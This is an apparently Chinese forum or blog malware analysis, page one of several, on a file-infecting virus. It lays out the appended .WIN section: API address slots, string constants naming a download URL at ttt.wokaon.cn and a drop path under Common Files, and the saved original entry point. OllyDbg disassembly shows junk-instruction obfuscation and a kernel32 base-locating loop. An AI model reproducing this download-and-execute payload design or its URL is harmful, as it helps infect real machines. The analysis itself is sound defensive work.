|
二、被感染文件中加入的内容及其行为分析
程序被感染后,加入一个.WIN节,入口点指向其中
最前面0C5的内容是“数据区”,其中可明显看出有意义的部分,包括以下内容(以下地址为相对.WIN节头的偏移): ***********************************************************************************************
1. 预留空间保存变量(在被感染程序运行时,先运行的代码会向这部分写入数据)
+00H urlmon的基址
+04H GetProcAddress函数地址
+08H LoadLibraryA函数地址
+0CH FreeLibrary函数地址
+10H ExitProcess函数地址
+14H GetModuleHandleA函数地址
+18H URLDownloadToFileA函数地址
+1CH WinExec函数地址
2. 用到的字符串常量:
+20H "LoadLibraryA",0
+2DH "FreeLibrary",0
+39H "ExitProcess",0
+45H "GetModuleHandleA",0
+56H "WinExec",0
+5FH "urlmon",0
+66H "URLDownloadToFileA",0
+79H "http://ttt.wokaon.cn/main.exe",0
+97H "c:\Program Files\Common Files\WIN.exe",0
……………………
3. 保存的程序原基址和入口点,代码执行后读取这里,并跳回原入口点执行。要修复被感染文件,也要知道这两个值:
+BDH 程序原ImageBase
+C1H 程序原AddressOfEntryPoint **********************************************************************************************
+C5H开始,将是加入的代码(病毒主文件内存中的13152BF8到13152D88的内容)
我直接在病毒主文件里面看了,OD里反汇编分析了下,大致如下:
13152C04是入口。
**********************************************************************************************
13152BFD 58 pop eax ; pop得到EIP,即此句代码位置
13152BFE 83E8 05 sub eax, 5 ; call代码的位置
13152C01 C3 retn
13152C02 8BC0 mov eax, eax
13152C04 55 push ebp ; 入口
13152C05 8BEC mov ebp, esp
13152C07 83C4 EC add esp, -14
13152C0A 53 push ebx
13152C0B 56 push esi
13152C0C 57 push edi
13152C0D 8D75 FC lea esi, dword ptr [ebp-4] ; 程序初始化时,堆栈中的指向kernel32.dll内的一个地址
**********************************************************************************************
接下来一段是花指令:
**********************************************************************************************
13152C10 EB 01 jmp short 13152C13
13152C12 90 nop ; 原是E8,是加花
13152C13 90 nop
13152C14 90 nop
13152C15 90 nop
13152C16 90 nop
13152C17 90 nop
13152C18 90 nop
13152C19 EB 01 jmp short 13152C1C
13152C1B 90 nop ; 原是E8,是加花
13152C1C 90 nop
13152C1D 90 nop
**********************************************************************************************
下面才接着又是有意义的:
**********************************************************************************************
13152C1E /EB 0F jmp short 13152C2F
13152C20 |8138 4D5A9000 cmp dword ptr [eax], 905A4D ; 找kernel32.dll的MZ头,定位其基址
13152C26 |74 12 je short 13152C3A ; 找到后跳出,这时eax为kernel32.dll的基址
13152C28 |2D 00100000 sub eax, 1000
13152C2D ^|EB F1 jmp short 13152C20
13152C2F \8B4424 14 mov eax, dword ptr [esp+14]
13152C33 25 0000FFFF and eax, FFFF0000
13152C38 ^ EB E6 jmp short 13152C20
13152C3A 8945 FC mov dword ptr [ebp-4], eax ; 保存kernel32.dll基址
********************************************************************************************** [1] [2] [3] [4] 下一页 |
